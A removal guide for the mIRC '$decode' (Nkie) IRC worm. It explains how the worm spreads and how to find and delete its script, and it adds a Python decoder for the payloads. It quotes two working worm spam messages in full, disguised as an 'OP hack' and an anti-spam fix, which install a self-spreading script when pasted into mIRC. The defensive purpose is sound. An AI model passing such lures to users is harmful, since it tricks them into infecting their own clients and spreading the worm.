
Nkie Worm Removal
The IRC/Nkie worm is among the top five most common IRC worms today. It is also the least documented worm on the internet. This worm is commonly called the $decode worm on IRC. The original $decode is a mIRC script named nkie.txt. It is triggered when someone types !list in any channel an infected user is in. The trigger is a short piece of mIRC code, base64-encoded with mIRC's $encode(), sent to the person who typed the !list command.

Today there are many variants; all of them send the encoded mIRC code to anyone who either types a trigger or joins/parts a channel the infected user is in. Some variants have a timer in the code that waits a few seconds and then sends the code only if the user is not opped. This is to prevent channel operators from seeing the spam and kicking the infected user. Most people do not even realize they have this worm until they are kicked from an IRC channel with instructions to join #NoHack. To date the worm has no destructive payload, but that could change. As with any worm, care should be taken when removing it.
The worm spreads by spamming people over IRC networks with messages similar to these:

<cooleun> hey Golcor to get OPs use this hack in the chan but SHH! //$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)

<^BlueyEBOy^> STOP SPAM, USE THIS COMMAND: //write nospam $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3BhbSAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs nospam | //mode $me +R
It works with the $decode() and $encode() identifiers built into the mIRC scripting language. When a user is spammed with one of these messages and then copies the text into the edit box, the text is interpreted by mIRC and executed as if the user had typed the command in plainly. Although the scripts vary in what they say, the theme is the same: they write a small script to the mIRC folder, load it into the remote section of mIRC, and then go to work spamming others, enticing them to copy and paste too. Any name can be given to the file. Some common file names include:
Ä
chat
dab.txt
god.dll
hack
mirc32.ini
nkie.txt
nospam
twg.txt
s.txt
vv.pif
Because it is a simple spam worm, removal is easy: simply unload and delete the script. If you have a lot of scripts loaded, you will have to determine which script(s) are spamming. One easy way to do this is to copy the last part of the actual message you are spamming and /echo it back to yourself in the status window. Taking the first example from above, you would copy $decode( LmxvYWQgLXJzIMQ= ,m) to the clipboard. Then in the status window type:

//echo -a . $decode( LmxvYWQgLXJzIMQ= ,m)

This will reveal the file name of the script. All $decode worms will have a load command after the final "|" character. In this case we see that .load -rs Ä is the final command, giving us the file name Ä, or ASCII character 142. You can type this letter by holding down the ALT key and pressing 142 on the numeric pad, then releasing the ALT key. Regardless of the temptation or promises, do not copy and paste anything in mIRC you do not understand.
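As an added illustration (not part of the original page), the following Python script performs the same check as the /echo trick above, but offline: it expands every $decode(...,m) call in a pasted message to its plaintext and reports the file name passed to the last load command, which is the script to unload and delete. It assumes the two spam samples quoted on this page and treats the decoded bytes as latin-1.

```python
import base64
import re
from typing import Optional

# mIRC's $decode(text,m) is plain base64 (the 'm' switch). This regex picks
# out every such call in a pasted message; the decoded bytes are treated as
# latin-1, a single-byte code page like the one mIRC used then (0xC4 = 'Ä').
DECODE_CALL = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)")
# The worm ends with a load command; this captures the script file name.
LOAD_CMD = re.compile(r"\bload\s+-rs\s+(\S+)")


def expand_message(message: str) -> str:
    """Replace each $decode(...,m) call with its plaintext, giving the
    command line mIRC would execute if the message were pasted and sent."""
    def decode(match):
        return base64.b64decode(match.group(1)).decode("latin-1")
    return DECODE_CALL.sub(decode, message)


def loaded_script_name(message: str) -> Optional[str]:
    """Return the file name given to the last '.load -rs' in the expanded
    message (the script to unload and delete), or None if there is none."""
    names = LOAD_CMD.findall(expand_message(message))
    return names[-1] if names else None


# Both samples are the spam messages quoted on this page, with the nick and
# chat text stripped and the line-wrapped base64 rejoined into one token.
SAMPLE_1 = ("//$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) | "
            "$decode( LmxvYWQgLXJzIMQ= ,m)")
SAMPLE_2 = ("//write nospam $decode("
            "b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZy"
            "AkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0"
            "ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcm"
            "lwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3Bhb"
            "SAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs "
            "nospam | //mode $me +R")

if __name__ == "__main__":
    for sample in (SAMPLE_1, SAMPLE_2):
        print(expand_message(sample))
        print("script to unload and delete:", loaded_script_name(sample))
```

Running it on the first sample prints the expanded command //write Ä $read($script,n,1) | .load -rs Ä, the same result the /echo check gives inside mIRC.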
This worm is a new spin on an old trick. The same thing used to be achieved by getting users to copy endless $chr() characters into the edit box, which will execute any command given as if it was typed normally.